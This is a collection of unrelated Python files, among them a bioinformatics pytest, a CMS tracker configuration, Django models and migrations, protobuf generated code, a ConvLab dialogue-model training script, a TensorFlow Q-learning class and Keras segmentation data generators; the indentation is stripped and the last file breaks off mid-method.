def test_posrich():
"Test positional enrichment"
# load data
X_list = open(PATH+'multiple.txt').read().splitlines()
X_err = 'AGT2HT9'
# test posrich single position
posrich_single = posrich(X_list, position=2, aminoacid='A')
assert np.array_equal(posrich_single, np.array([1.,0.,1.]))
# test posrich multiple positions
posrich_multiple = posrich(X_list, position=[2, 4], aminoacid=['A', 'K'])
assert np.array_equal(posrich_multiple[:,0], np.array([1.,0.,1.]))
assert np.array_equal(posrich_multiple[:,1], np.array([1.,0.,0.]))
# test ValueError (erroneous input single)
with pytest.raises(ValueError):
posrich_err = posrich(X_err, position=1, aminoacid='R')
# test ValueError (position / amino acid mismatch)
with pytest.raises(ValueError):
posrich_err = posrich(X_err, position=[1, 2], aminoacid=['R', 'A', 'K'])
# test ValueError (position / amino acid mismatch alphabetical)
with pytest.raises(ValueError):
posrich_err = posrich(X_err, position=[1, 2], aminoacid=['R', 'A'])
# test ValueError (erroneous function arguments)
with pytest.raises(ValueError):
posrich_err = posrich(X_err, position='R', aminoacid=1)
|
import FWCore.ParameterSet.Config as cms
from RecoLocalTracker.SiStripZeroSuppression.DefaultAlgorithms_cff import *
siStripZeroSuppression = cms.EDProducer("SiStripZeroSuppression",
Algorithms = DefaultAlgorithms,
RawDigiProducersList = cms.VInputTag( cms.InputTag('siStripDigis','VirginRaw'),
cms.InputTag('siStripDigis','ProcessedRaw'),
cms.InputTag('siStripDigis','ScopeMode')),
DigisToMergeZS = cms.InputTag('siStripDigis','ZeroSuppressed'),
DigisToMergeVR = cms.InputTag('siStripVRDigis','VirginRaw'),
storeCM = cms.bool(True),
fixCM= cms.bool(False), # put -999 into CM collection for "inspected" APV
produceRawDigis = cms.bool(True), # if mergeCollection is True, produceRawDigi is not considered
produceCalculatedBaseline = cms.bool(False),
produceBaselinePoints = cms.bool(False),
storeInZScollBadAPV = cms.bool(True),
mergeCollections = cms.bool(False)
)
# The SiStripClusters are not used anymore in phase2 tracking
# This part has to be clean up when they will be officially removed from the entire flow
from Configuration.Eras.Modifier_phase2_tracker_cff import phase2_tracker
phase2_tracker.toModify(siStripZeroSuppression, # FIXME
RawDigiProducersList = cms.VInputTag( cms.InputTag('simSiStripDigis','VirginRaw'),
cms.InputTag('simSiStripDigis','ProcessedRaw'),
cms.InputTag('simSiStripDigis','ScopeMode'))
)
|
#!/usr/bin/env python
#===============================================================================
# Copyright (c) 2014 Geoscience Australia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither Geoscience Australia nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===============================================================================
"""
AcquisitionRecord: database interface class.
These classes provide an interface between the database and the top-level
ingest algorithm (AbstractIngester and its subclasses). They also provide
the implementation of the database and tile store side of the ingest
process. They are expected to be independent of the structure of any
particular dataset, but will change if the database schema or tile store
format changes.
"""
from __future__ import absolute_import
import logging
from .ingest_db_wrapper import IngestDBWrapper
from .dataset_record import DatasetRecord
# Set up logger.
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.INFO)
class AcquisitionRecord(object):
"""AcquisitionRecord database interface class."""
ACQUISITION_METADATA_FIELDS = ['satellite_tag',
'sensor_name',
'x_ref',
'y_ref',
'start_datetime',
'end_datetime',
'll_lon',
'll_lat',
'lr_lon',
'lr_lat',
'ul_lon',
'ul_lat',
'ur_lon',
'ur_lat',
'gcp_count',
'mtl_text',
'cloud_cover'
]
def __init__(self, collection, dataset):
self.collection = collection
self.datacube = collection.datacube
self.db = IngestDBWrapper(self.datacube.db_connection)
self.acquisition_dict = {}
self.acquisiton_id = None # set below
# Fill a dictonary with data for the acquisition.
# Start with fields from the dataset metadata.
for field in self.ACQUISITION_METADATA_FIELDS:
self.acquisition_dict[field] = dataset.metadata_dict[field]
# Next look up the satellite_id and sensor_id in the
# database and fill these in.
self.acquisition_dict['satellite_id'] = \
self.db.get_satellite_id(self.acquisition_dict['satellite_tag'])
self.acquisition_dict['sensor_id'] = \
self.db.get_sensor_id(self.acquisition_dict['satellite_id'],
self.acquisition_dict['sensor_name'])
# Finally look up the acquisiton_id, or create a new record if it
# does not exist, and fill it into the dictionary.
self.acquisition_id = \
self.db.get_acquisition_id_fuzzy(self.acquisition_dict)
if self.acquisition_id is None:
self.acquisition_id = \
self.db.insert_acquisition_record(self.acquisition_dict)
else:
# Do we update the acquisition record here?
pass
self.acquisition_dict['acquisition_id'] = self.acquisition_id
def create_dataset_record(self, dataset):
"""Factory method to create an instance of the DatasetRecord class.
This method creates a new record in the database if one does not
already exist. It will overwrite an earlier dataset record (and its
tiles) if one exists. It will raise a DatasetError if a later (or
equal time) record for this dataset already exists in the database.
"""
return DatasetRecord(self.collection, self, dataset)
|
#!/usr/bin/env python
import django, sys, glob, os
sys.path.append('../../server/')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dva.settings")
django.setup()
from dvaui.view_shared import handle_uploaded_file
from dvaapp.tasks import perform_import, perform_frame_download
from django.core.files.uploadedfile import SimpleUploadedFile
from dvaapp.models import TEvent
if __name__ == '__main__':
for fname in glob.glob('../ci/framelist.*'):
name = fname.split('/')[-1].split('.')[0]
f = SimpleUploadedFile(fname, file(fname).read(), content_type="application/json")
v = handle_uploaded_file(f, name)
dt = TEvent.objects.get(video=v, operation='perform_import')
perform_import(dt.pk)
for t in TEvent.objects.filter(parent=dt):
perform_frame_download(t.pk)
|
x = int(input(" "))
y = 5*x-400
print(y)
if y < 100:
print('1')
elif y == 100:
print('0')
elif y > 100:
print('-1')
|
from __future__ import division, print_function, unicode_literals
import argparse
import json
import random
import time
from io import open
import os
import numpy as np
import torch
from torch.optim import Adam
from convlab2.policy.mdrg.multiwoz.utils import util
from convlab2.policy.mdrg.multiwoz.model import Model
parser = argparse.ArgumentParser(description='S2S')
parser.add_argument('--batch_size', type=int, default=64, metavar='N', help='input batch size for training (default: 128)')
parser.add_argument('--vocab_size', type=int, default=400, metavar='V')
parser.add_argument('--use_attn', type=util.str2bool, nargs='?', const=True, default=False)
parser.add_argument('--attention_type', type=str, default='bahdanau')
parser.add_argument('--use_emb', type=util.str2bool, nargs='?', const=True, default=False)
parser.add_argument('--emb_size', type=int, default=50)
parser.add_argument('--hid_size_enc', type=int, default=150)
parser.add_argument('--hid_size_dec', type=int, default=150)
parser.add_argument('--hid_size_pol', type=int, default=150)
parser.add_argument('--db_size', type=int, default=30)
parser.add_argument('--bs_size', type=int, default=94)
parser.add_argument('--cell_type', type=str, default='lstm')
parser.add_argument('--depth', type=int, default=1, help='depth of rnn')
parser.add_argument('--max_len', type=int, default=50)
parser.add_argument('--optim', type=str, default='adam')
parser.add_argument('--lr_rate', type=float, default=0.005)
parser.add_argument('--lr_decay', type=float, default=0.0)
parser.add_argument('--l2_norm', type=float, default=0.00001)
parser.add_argument('--clip', type=float, default=5.0, help='clip the gradient by norm')
parser.add_argument('--teacher_ratio', type=float, default=1.0, help='probability of using targets for learning')
parser.add_argument('--dropout', type=float, default=0.0)
parser.add_argument('--no_cuda', type=util.str2bool, nargs='?', const=True, default=True)
parser.add_argument('--seed', type=int, default=0, metavar='S', help='random seed (default: 1)')
parser.add_argument('--train_output', type=str, default='data/train_dials/', help='Training output dir path')
parser.add_argument('--max_epochs', type=int, default=15)
parser.add_argument('--early_stop_count', type=int, default=2)
parser.add_argument('--model_dir', type=str, default='model/model/')
parser.add_argument('--model_name', type=str, default='translate.ckpt')
parser.add_argument('--load_param', type=util.str2bool, nargs='?', const=True, default=False)
parser.add_argument('--epoch_load', type=int, default=0)
parser.add_argument('--mode', type=str, default='train', help='training or testing: test, train, RL')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
device = torch.device("cuda" if args.cuda else "cpu")
def train(print_loss_total,print_act_total, print_grad_total, input_tensor, target_tensor, bs_tensor, db_tensor, name=None):
# create an empty matrix with padding tokens
input_tensor, input_lengths = util.padSequence(input_tensor)
target_tensor, target_lengths = util.padSequence(target_tensor)
bs_tensor = torch.tensor(bs_tensor, dtype=torch.float, device=device)
db_tensor = torch.tensor(db_tensor, dtype=torch.float, device=device)
loss, loss_acts, grad = model.train(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor,
bs_tensor, name)
#print(loss, loss_acts)
print_loss_total += loss
print_act_total += loss_acts
print_grad_total += grad
model.global_step += 1
model.sup_loss = torch.zeros(1)
return print_loss_total, print_act_total, print_grad_total
def trainIters(model, n_epochs=10, args=args):
prev_min_loss, early_stop_count = 1 << 30, args.early_stop_count
start = time.time()
for epoch in range(1, n_epochs + 1):
print_loss_total = 0; print_grad_total = 0; print_act_total = 0 # Reset every print_every
start_time = time.time()
# watch out where do you put it
model.optimizer = Adam(lr=args.lr_rate, params=filter(lambda x: x.requires_grad, model.parameters()), weight_decay=args.l2_norm)
model.optimizer_policy = Adam(lr=args.lr_rate, params=filter(lambda x: x.requires_grad, model.policy.parameters()), weight_decay=args.l2_norm)
dials = list(train_dials.keys())
random.shuffle(dials)
input_tensor = [];target_tensor = [];bs_tensor = [];db_tensor = []
for name in dials:
val_file = train_dials[name]
model.optimizer.zero_grad()
model.optimizer_policy.zero_grad()
input_tensor, target_tensor, bs_tensor, db_tensor = util.loadDialogue(model, val_file, input_tensor, target_tensor, bs_tensor, db_tensor)
if len(db_tensor) > args.batch_size:
print_loss_total, print_act_total, print_grad_total = train(print_loss_total, print_act_total, print_grad_total, input_tensor, target_tensor, bs_tensor, db_tensor)
input_tensor = [];target_tensor = [];bs_tensor = [];db_tensor = [];
print_loss_avg = print_loss_total / len(train_dials)
print_act_total_avg = print_act_total / len(train_dials)
print_grad_avg = print_grad_total / len(train_dials)
print('TIME:', time.time() - start_time)
print('Time since %s (Epoch:%d %d%%) Loss: %.4f, Loss act: %.4f, Grad: %.4f' % (util.timeSince(start, epoch / n_epochs),
epoch, epoch / n_epochs * 100, print_loss_avg, print_act_total_avg, print_grad_avg))
# VALIDATION
valid_loss = 0
for name, val_file in val_dials.items():
input_tensor = []; target_tensor = []; bs_tensor = [];db_tensor = []
input_tensor, target_tensor, bs_tensor, db_tensor = util.loadDialogue(model, val_file, input_tensor,
target_tensor, bs_tensor,
db_tensor)
# create an empty matrix with padding tokens
input_tensor, input_lengths = util.padSequence(input_tensor)
target_tensor, target_lengths = util.padSequence(target_tensor)
bs_tensor = torch.tensor(bs_tensor, dtype=torch.float, device=device)
db_tensor = torch.tensor(db_tensor, dtype=torch.float, device=device)
proba, _, _ = model.forward(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor, bs_tensor)
proba = proba.view(-1, model.vocab_size) # flatten all predictions
loss = model.gen_criterion(proba, target_tensor.view(-1))
valid_loss += loss.item()
valid_loss /= len(val_dials)
print('Current Valid LOSS:', valid_loss)
model.saveModel(epoch)
def loadDictionaries():
# load data and dictionaries
with open(os.path.join(os.path.dirname(__file__), 'data/input_lang.index2word.json'), 'r') as f:
input_lang_index2word = json.load(f)
with open(os.path.join(os.path.dirname(__file__), 'data/input_lang.word2index.json'), 'r') as f:
input_lang_word2index = json.load(f)
with open(os.path.join(os.path.dirname(__file__), 'data/output_lang.index2word.json'), 'r') as f:
output_lang_index2word = json.load(f)
with open(os.path.join(os.path.dirname(__file__), 'data/output_lang.word2index.json'), 'r') as f:
output_lang_word2index = json.load(f)
return input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index
if __name__ == '__main__':
input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index = loadDictionaries()
# Load training file list:
with open(os.path.join(os.path.dirname(__file__),'data/train_dials.json'), 'r') as outfile:
train_dials = json.load(outfile)
# Load validation file list:
with open(os.path.join(os.path.dirname(__file__), 'data/val_dials.json'), 'r') as outfile:
val_dials = json.load(outfile)
model = Model(args, input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index)
if args.load_param:
model.loadModel(args.epoch_load)
trainIters(model, n_epochs=args.max_epochs, args=args)
|
from django.db import models
class Post(models.Model):
title = models.CharField(max_length=100)
content = models.TextField()
# slug = models.SlugField()
# class Meta:
# verbose_name = _("")
# verbose_name_plural = _("s")
def __str__(self):
return self.title
# def get_absolute_url(self):
# return f'/{self.slug}/'
|
# Generated by Django 3.0.5 on 2020-05-19 21:16
from django.db import migrations, models
import django.db.models.deletion
import exercises.helper
import exercises.validators
class Migration(migrations.Migration):
dependencies = [
('exercises', '0012_auto_20200514_2227'),
]
operations = [
migrations.AlterField(
model_name='submission',
name='file',
field=models.FileField(upload_to=exercises.helper.get_submission_path, validators=[exercises.validators.FileValidator(allowed_extensions=['py'], allowed_mimetypes=['text/x-python', 'text/plain'], max_size=5000, min_size=30)]),
),
migrations.AlterField(
model_name='testresult',
name='first_error',
field=models.TextField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='testresult',
name='first_failure',
field=models.TextField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='testresult',
name='submission',
field=models.OneToOneField(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='test_result', to='exercises.Submission'),
),
]
|
from .api.client import ApiClient
from .api.external_task import ExternalTaskApi
class CamundaClient:
"""
A client for communicating with a Camunda server.
"""
def __init__(self, *args, **kwargs):
self.api = ApiClient(*args, **kwargs)
@property
def external_task(self):
return ExternalTaskApi(self.api)
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Data/Logs/ActionLogEntry.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Data.Logs import CatchPokemonLogEntry_pb2 as POGOProtos_dot_Data_dot_Logs_dot_CatchPokemonLogEntry__pb2
from POGOProtos.Data.Logs import FortSearchLogEntry_pb2 as POGOProtos_dot_Data_dot_Logs_dot_FortSearchLogEntry__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Data/Logs/ActionLogEntry.proto',
package='POGOProtos.Data.Logs',
syntax='proto3',
serialized_pb=_b('\n)POGOProtos/Data/Logs/ActionLogEntry.proto\x12\x14POGOProtos.Data.Logs\x1a/POGOProtos/Data/Logs/CatchPokemonLogEntry.proto\x1a-POGOProtos/Data/Logs/FortSearchLogEntry.proto\"\xc5\x01\n\x0e\x41\x63tionLogEntry\x12\x14\n\x0ctimestamp_ms\x18\x01 \x01(\x03\x12\r\n\x05sfida\x18\x02 \x01(\x08\x12\x43\n\rcatch_pokemon\x18\x03 \x01(\x0b\x32*.POGOProtos.Data.Logs.CatchPokemonLogEntryH\x00\x12?\n\x0b\x66ort_search\x18\x04 \x01(\x0b\x32(.POGOProtos.Data.Logs.FortSearchLogEntryH\x00\x42\x08\n\x06\x41\x63tionb\x06proto3')
,
dependencies=[POGOProtos_dot_Data_dot_Logs_dot_CatchPokemonLogEntry__pb2.DESCRIPTOR,POGOProtos_dot_Data_dot_Logs_dot_FortSearchLogEntry__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ACTIONLOGENTRY = _descriptor.Descriptor(
name='ActionLogEntry',
full_name='POGOProtos.Data.Logs.ActionLogEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='timestamp_ms', full_name='POGOProtos.Data.Logs.ActionLogEntry.timestamp_ms', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sfida', full_name='POGOProtos.Data.Logs.ActionLogEntry.sfida', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='catch_pokemon', full_name='POGOProtos.Data.Logs.ActionLogEntry.catch_pokemon', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='fort_search', full_name='POGOProtos.Data.Logs.ActionLogEntry.fort_search', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='Action', full_name='POGOProtos.Data.Logs.ActionLogEntry.Action',
index=0, containing_type=None, fields=[]),
],
serialized_start=164,
serialized_end=361,
)
_ACTIONLOGENTRY.fields_by_name['catch_pokemon'].message_type = POGOProtos_dot_Data_dot_Logs_dot_CatchPokemonLogEntry__pb2._CATCHPOKEMONLOGENTRY
_ACTIONLOGENTRY.fields_by_name['fort_search'].message_type = POGOProtos_dot_Data_dot_Logs_dot_FortSearchLogEntry__pb2._FORTSEARCHLOGENTRY
_ACTIONLOGENTRY.oneofs_by_name['Action'].fields.append(
_ACTIONLOGENTRY.fields_by_name['catch_pokemon'])
_ACTIONLOGENTRY.fields_by_name['catch_pokemon'].containing_oneof = _ACTIONLOGENTRY.oneofs_by_name['Action']
_ACTIONLOGENTRY.oneofs_by_name['Action'].fields.append(
_ACTIONLOGENTRY.fields_by_name['fort_search'])
_ACTIONLOGENTRY.fields_by_name['fort_search'].containing_oneof = _ACTIONLOGENTRY.oneofs_by_name['Action']
DESCRIPTOR.message_types_by_name['ActionLogEntry'] = _ACTIONLOGENTRY
ActionLogEntry = _reflection.GeneratedProtocolMessageType('ActionLogEntry', (_message.Message,), dict(
DESCRIPTOR = _ACTIONLOGENTRY,
__module__ = 'POGOProtos.Data.Logs.ActionLogEntry_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Data.Logs.ActionLogEntry)
))
_sym_db.RegisterMessage(ActionLogEntry)
# @@protoc_insertion_point(module_scope)
|
from threading import Lock
from typing import Any
import requests
class SessionCore:
"""
SessionCore is a singleton class.
"""
_has_instance = None
_lock = Lock()
def __new__(cls: Any) -> "SessionCore":
if not cls._has_instance:
with cls._lock:
if not cls._has_instance:
cls._has_instance = super(SessionCore, cls).__new__(cls)
cls.session = requests.Session()
return cls._has_instance # type: ignore
SessionCore()
|
import tensorflow as tf
import numpy as np
from tensorflow.contrib import rnn, layers
class DQL(object):
def __init__(self,
input_len,
nb_state_token,
nb_action_token):
self.input_len = input_len
self.nb_state_token = nb_state_token
self.nb_action_token = nb_action_token
self.built = False
def build(self,
cells=[64, 64],
basic_cell=rnn.LSTMCell,
state_emb_dim=50,
action_emb_dim=50,
batch_size=1,
learning_rate=1e-4,
clip_norm=1.,
gamma=1.0):
# state
single_state = tf.placeholder('int32', [1, self.input_len],
name='single_state')
batch_state = tf.placeholder('int32', [batch_size, self.input_len],
name='batch_state')
# state_embW = self.get_preset_state_emb(self.nb_state_token)
state_embW = tf.Variable(
tf.random_uniform([self.nb_state_token, state_emb_dim], -1.0, 1.0),
name='state_embW')
single_state_emb = tf.nn.embedding_lookup(state_embW, single_state)
batch_state_emb = tf.nn.embedding_lookup(state_embW, batch_state)
encoder = rnn.MultiRNNCell([basic_cell(c) for c in cells])
single_encoder_outputs, _ = \
tf.nn.dynamic_rnn(encoder, single_state_emb, dtype=tf.float32)
batch_encoder_outputs, _ = \
tf.nn.dynamic_rnn(encoder, batch_state_emb, dtype=tf.float32)
single_last_output = single_encoder_outputs[:, -1, :]
batch_last_output = batch_encoder_outputs[:, -1, :]
# action
action = tf.placeholder('int32', [batch_size], name='action')
action_embW = tf.Variable(
tf.random_uniform([self.nb_action_token,
action_emb_dim], -1.0, 1.0), name='action_embW')
# (bs, a_emb_dim)
action_emb = tf.nn.embedding_lookup(action_embW, action)
# joint
joint = tf.concat([batch_last_output, action_emb], axis=-1)
def decision_fnn(input, reuse):
with tf.variable_scope('decision', reuse=reuse):
x = layers.linear(input, 512, scope='d1')
x = tf.nn.relu(x)
x = layers.linear(x, 256, scope='d2')
x = tf.nn.relu(x)
x = layers.linear(x, 1, scope='qv')
return x
qvalue = decision_fnn(joint, reuse=False)
# expected_qv
expected_qv = tf.placeholder('float32', [batch_size],
name='expected_qv')
loss = expected_qv-qvalue[:, 0]
loss = tf.where(tf.abs(loss) < 1.0,
0.5 * tf.square(loss),
tf.abs(loss) - 0.5)
loss = tf.reduce_mean(loss)
optimizer = tf.train.AdamOptimizer(
learning_rate=learning_rate)
train_op = tf.contrib.slim.learning.create_train_op(
loss, optimizer, clip_gradient_norm=clip_norm)
# enumerate every actions
joints = tf.concat([tf.tile(single_last_output,
(self.nb_action_token, 1)),
action_embW], axis=-1)
qvalues = decision_fnn(joints, reuse=True)
max_qv = tf.reduce_max(qvalues)
max_qv_ind = tf.argmax(qvalues[:, 0])
# calculate Q(s, a)
self.single_state = single_state
self.batch_state = batch_state
self.qvalue = qvalue
self.action = action
# training
self.expected_qv = expected_qv
self.train_op = train_op
self.loss = loss
self.batch_size = batch_size
self.gamma = gamma
# finding max_{a'} Q(s', a')
self.qvalues = qvalues
self.max_qv = max_qv
self.max_qv_ind = max_qv_ind
self.built = True
def train(self,
env,
continued=False,
epsilon=0.1,
epsilon_decay=0.99,
epsilon_min=0.1,
iterations=1000,
rng=np.random,
max_exp=200):
assert (self.built)
with tf.Session() as sess:
R = tf.Variable(0.)
R_summary = tf.summary.scalar('R', R)
sess.run(tf.global_variables_initializer())
train_writer = tf.summary.FileWriter('tensorboard', sess.graph)
saver = tf.train.Saver()
if continued:
saver.restore(sess, 'session/sess.ckpt')
exp = []
global_step = tf.get_collection(tf.GraphKeys.GLOBAL_STEP)[0]
i = begin = global_step.eval()
for i in range(begin, begin+iterations):
env.reset()
sess.run(R.assign(0))
print '[{}, {}]'.format(i, epsilon)
while True:
s = env.state
if rng.rand() < epsilon:
a = rng.choice(self.nb_action_token)
else:
a = sess.run(self.max_qv_ind,
feed_dict={self.single_state: [s]})
r = env.play(a)
s_next = env.state
exp.append((s, a, r, s_next))
# print s
sess.run(R.assign_add(r))
if r <= 0:
break
# sample and update
batch_s = []
batch_a = []
batch_q = []
batch_ind = np.random.choice(len(exp),
size=(self.batch_size,))
for exp_ind in batch_ind:
s, a, r, s_next = exp[exp_ind]
if r > 0:
exp_pv = sess.run(self.max_qv,
feed_dict={self.single_state:
[s_next]})
exp_pv = r + self.gamma*exp_pv
else:
exp_pv = r
batch_s.append(s)
batch_a.append(a)
batch_q.append(exp_pv)
feed_dict = {self.batch_state: batch_s,
self.action: batch_a,
self.expected_qv: batch_q}
qv, loss, _ = sess.run([self.qvalue,
self.loss,
self.train_op],
feed_dict=feed_dict)
# print loss, zip(qv[:, 0], batch_q)
epsilon = max(epsilon*epsilon_decay, epsilon_min)
if len(exp) > max_exp:
np.random.shuffle(exp)
exp = exp[:int(max_exp*0.2)]
print 'shuffle'
train_writer.add_summary(R_summary.eval(), i)
if i % 100 == 0:
saver.save(sess, 'session/sess.ckpt')
def get_preset_state_emb(self, n):
emb = np.ones((n+1, n+1), dtype='float32') * (-1)
emb[0] = 0
for i in range(1, n+1):
for j in range(i):
emb[i, j] = +1
return tf.Variable(emb, name='state_embW', trainable=False)
if __name__ == '__main__':
pass
|
string = "Practice Problems to Drill List Comprehension in Your Head."
count = 0
for i in range(len(string)):
if string[i] == ' ':
count += 1
print(count)
my_space = len([space for space in string if ' ' in space])
print(my_space)
|
def hello_world():
return "Hello from Python CI Template!"
if __name__ == "__main__":
print(hello_world())
|
from keras.utils import Sequence
import numpy as np
import cv2
#from script.cloud_images_segmentation_utillity_script import build_masks
from script.my_util import build_masks
class DataGenerator(Sequence):
def __init__(self, images, imageName_to_imageIdx_dict, dataframe, batch_size, n_channels, target_size, n_classes,
mode='fit', target_df=None, shuffle=True, preprocessing=None, augmentation=None, seed=0):
self.batch_size = batch_size
self.dataframe = dataframe
self.mode = mode
self.target_df = target_df
self.target_size = target_size
self.n_channels = n_channels
self.n_classes = n_classes
self.shuffle = shuffle
self.augmentation = augmentation
self.preprocessing = preprocessing
self.seed = seed
self.mask_shape = (1400, 2100)
self.list_IDs = self.dataframe.index
self.images = images
self.imageName_to_imageIdx_dict = imageName_to_imageIdx_dict
if self.seed is not None:
np.random.seed(self.seed)
self.on_epoch_end()
return
def __len__(self):
return len(self.list_IDs) // self.batch_size
def __getitem__(self, index):
indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]
list_IDs_batch = [self.list_IDs[k] for k in indexes]
X = self.__generate_X(list_IDs_batch)
if self.mode == 'fit':
Y = self.__generate_Y(list_IDs_batch)
if self.augmentation:
X, Y = self.__augment_batch(X, Y)
return X, Y
elif self.mode == 'predict':
return X
def on_epoch_end(self):
self.indexes = np.arange(len(self.list_IDs))
if self.shuffle == True:
np.random.shuffle(self.indexes)
def __generate_X(self, list_IDs_batch):
X = np.empty((self.batch_size, *self.target_size, self.n_channels))
for i, ID in enumerate(list_IDs_batch):
img_name = self.dataframe['image'].loc[ID]
#img_path = self.directory + img_name
#img = cv2.imread(img_path)
#img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img_idx = self.imageName_to_imageIdx_dict[img_name]
img = self.images[img_idx]
if self.preprocessing:
img = self.preprocessing(img)
X[i,] = img
return X
def __generate_Y(self, list_IDs_batch):
Y = np.empty((self.batch_size, *self.target_size, self.n_classes), dtype=int)
for i, ID in enumerate(list_IDs_batch):
img_name = self.dataframe['image'].loc[ID]
image_df = self.target_df[self.target_df['image'] == img_name]
rles = image_df['EncodedPixels'].values
masks = build_masks(rles, input_shape=self.mask_shape, reshape=self.target_size)
Y[i, ] = masks
return Y
def __augment_batch(self, X_batch, Y_batch):
for i in range(X_batch.shape[0]):
X_batch[i, ], Y_batch[i, ] = self.__random_transform(X_batch[i, ], Y_batch[i, ])
return X_batch, Y_batch
def __random_transform(self, X, Y):
composed = self.augmentation(image=X, mask=Y)
X_aug = composed['image']
Y_aug = composed['mask']
return X_aug, Y_aug
class DataGenerator2(Sequence):
def __init__(self,
images, imageName_to_imageIdx_dict,
masks, imageName_to_maskIdx_dict,
dataframe, batch_size, n_channels, target_size, n_classes,
mode='fit', shuffle=True, preprocessing=None, augmentation=None, preproc_before_aug=True, seed=0,
mixup_alpha=None, mixhalf_p=None, mask_avefilter_kernel=None,
smooth_overlap_mask_base=None):
self.batch_size = batch_size
self.dataframe = dataframe
self.mode = mode
self.target_size = target_size
self.n_channels = n_channels
self.n_classes = n_classes
self.shuffle = shuffle
self.augmentation = augmentation
self.preprocessing = preprocessing
self.preproc_before_aug = preproc_before_aug
self.seed = seed
self.mask_shape = (1400, 2100)
self.list_IDs = self.dataframe.index
self.images = images
self.imageName_to_imageIdx_dict = imageName_to_imageIdx_dict
self.masks = masks
self.imageName_to_maskIdx_dict = imageName_to_maskIdx_dict
self.mixup_alpha = mixup_alpha
self.mixhalf_p = mixhalf_p
self.mask_avefilter_kernel = mask_avefilter_kernel
self.smooth_overlap_mask_base = smooth_overlap_mask_base
if self.seed is not None:
np.random.seed(self.seed)
self.on_epoch_end()
return
def __len__(self):
return len(self.list_IDs) // self.batch_size
def __getitem__(self, index):
indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]
list_IDs_batch = [self.list_IDs[k] for k in indexes]
X = self.__generate_X(list_IDs_batch)
if self.mode == 'fit':
Y = self.__generate_Y(list_IDs_batch)
if self.smooth_overlap_mask_base is not None:
Y = smooth_overlap_mask_v1(Y, self.smooth_overlap_mask_base)
if self.mask_avefilter_kernel is not None:
Y = average_filter(Y, self.mask_avefilter_kernel)
if self.mixhalf_p is not None:
X, Y = mixhalf(X, Y, self.mixhalf_p)
if self.mixup_alpha is not None:
X, Y = mixup(X, Y, self.mixup_alpha)
if self.augmentation:
X, Y = self.__augment_batch(X, Y)
if not self.preproc_before_aug:
if self.preprocessing:
X = self.preprocessing(X)
return X, Y
elif self.mode == 'predict':
if not self.preproc_before_aug:
if self.preprocessing:
X = self.preprocessing(X)
return X
def on_epoch_end(self):
self.indexes = np.arange(len(self.list_IDs))
if self.shuffle == True:
np.random.shuffle(self.indexes)
def __generate_X(self, list_IDs_batch):
# get type
for i, ID in enumerate(list_IDs_batch[:1]):
img_name = self.dataframe['image'].loc[ID]
